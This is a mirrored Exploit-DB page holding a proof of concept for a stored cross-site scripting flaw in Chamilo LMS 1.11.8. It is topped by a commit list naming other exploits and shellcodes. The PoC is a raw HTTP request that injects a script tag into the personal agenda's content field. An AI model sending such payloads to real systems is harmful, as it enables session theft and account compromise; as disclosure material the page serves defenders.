bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions 1
exploit-db-mirror/exploits/php/webapps/45535.txt
Offensive Security 21717894fe DB: 2018-10-06 
4 changes to exploits/shellcodes

Foxit Reader 9.0.1.1049 - Buffer Overflow (ASLR)(DEP)
Foxit Reader 9.0.1.1049 - Buffer Overflow (ASLR & DEP Bypass)

NICO-FTP 3.0.1.19 - Buffer Overflow (SEH)(ASLR)
NICO-FTP 3.0.1.19 - Buffer Overflow (SEH) (ASLR Bypass)
Netis ADSL Router DL4322D RTK 2.1.1 - Cross-Site Request Forgery (Add Admin)
D-Link Central WiFiManager Software Controller 1.03 - Multiple Vulnerabilities
ISPConfig < 3.1.13 - Remote Command Execution
Chamilo LMS 1.11.8 - Cross-Site Scripting

Linux/x86 - execve(/bin/sh) + ROT-N + Shift-N + XOR-N Encoded Shellcode (77 bytes)
Linux/x86 - execve(/bin/sh) + ROT-N/Shift-N/XOR-N Encoded Shellcode (77 bytes)

Linux/x86 - execve(/bin/sh) + ROT-13 + RShift-2 + XOR Encoded Shellcode (44 bytes)
Linux/x86 - execve(/bin/sh) + ROT-13/RShift-2/XOR Encoded Shellcode (44 bytes)

Linux/x86 - execve(/bin/sh) + NOT +SHIFT-N+ XOR-N Encoded Shellcode (50 byes)
Linux/x86 - execve(/bin/sh) + NOT/SHIFT-N/XOR-N Encoded Shellcode (50 byes)
2018-10-06 05:01:59 +00:00

27 lines
No EOL
1.3 KiB
Text
Raw Blame History

# Exploit Title: Chamilo LMS 1.11.8 - Cross-Site Scripting
# Author: Cakes
# Discovery Date: 2018-10-05
# Vendor Homepage: https://chamilo.org
# Software Link: https://github.com/chamilo/chamilo-lms/releases/download/v1.11.8/chamilo-1.11.8-php5.zip
# Tested Version: 1.11.8 for php5
# Tested on OS: Kali Linux
# CVE: N/A
# Description:
# Improper input validation on the Calendar / Personal Agenda page allows attackers add a persistent
# Cross-Site scripting attack to the meeting's content field when adding a new meeting.
# Simply intercept a new meeting request and add in the XSS
# PoC
GET /chamillo/main/inc/ajax/agenda.ajax.php?type=personal&a=add_event&start=2018-10-05%2000:00:00&end=2018-10-06%2000:00:00&all_day=true&view=month&title=Important+Info&content=%3Cp%3E<script>alert("Cakes");</script>%3C%2Fp%3E%0D%0A&_qf__form= HTTP/1.1
Host: 10.0.0.16
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
X-Requested-With: XMLHttpRequest
Referer: http://10.0.0.16/chamillo/main/calendar/agenda_js.php?type=personal
Cookie: defaultMyCourseView3=0; ch_sid=04uo1hmqp7e49f8l36e6s9oit1; agenda_cookies={%22view%22:%22month%22%2C%22start%22:%222018-10-01%22}
Connection: close
Reference in a new issue View git blame Copy permalink